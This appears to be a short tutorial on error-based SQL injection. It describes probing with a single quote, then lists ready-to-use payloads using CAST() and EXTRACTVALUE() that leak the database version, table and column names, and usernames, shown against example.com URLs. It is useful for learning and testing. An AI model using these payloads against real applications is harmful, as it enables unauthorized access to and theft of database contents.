Error-Based SQL Injection relies on forcing the database to throw errors that reveal sensitive information. These errors can expose database structure, table names, column names, or even data.
How it works:
Key Point:
Identify the Vulnerability:
Input a single quote (') or other special characters to see if the application throws an SQL error.
Example: If vulnerable, the application might return an error like:
<http://example.com/products?id=1>'
You have an error in your SQL syntax; check the manual near ''' at line 1
Force Errors to Extract Information:
Use SQL functions like CAST(), CONVERT(), or EXTRACTVALUE() to generate errors containing useful information.
Example: Extract the database version: If successful, the error message might reveal the database version.
<http://example.com/products?id=1>' AND 1=CAST((SELECT version()) AS INT)--
Extract Table and Column Names:
Use the information_schema database to extract table and column names.
Example: Extract the first table name:
<http://example.com/products?id=1> AND 1=CAST((SELECT table_name FROM information_schema.tables LIMIT 1) AS INT)--
Here are some example payloads for Error-Based SQL Injection:
Extract Database Version:
AND 1=CAST((SELECT version()) AS INT)--
Extract Table Names:
AND 1=CAST((SELECT table_name FROM information_schema.tables LIMIT 1) AS INT)--
Extract Column Names:
AND 1=CAST((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) AS INT)--
Extract Data:
AND 1=CAST((SELECT username FROM users LIMIT 1) AS INT)--
Using EXTRACTVALUE for XML Errors:
AND EXTRACTVALUE(1, CONCAT(0x3a, (SELECT version())))--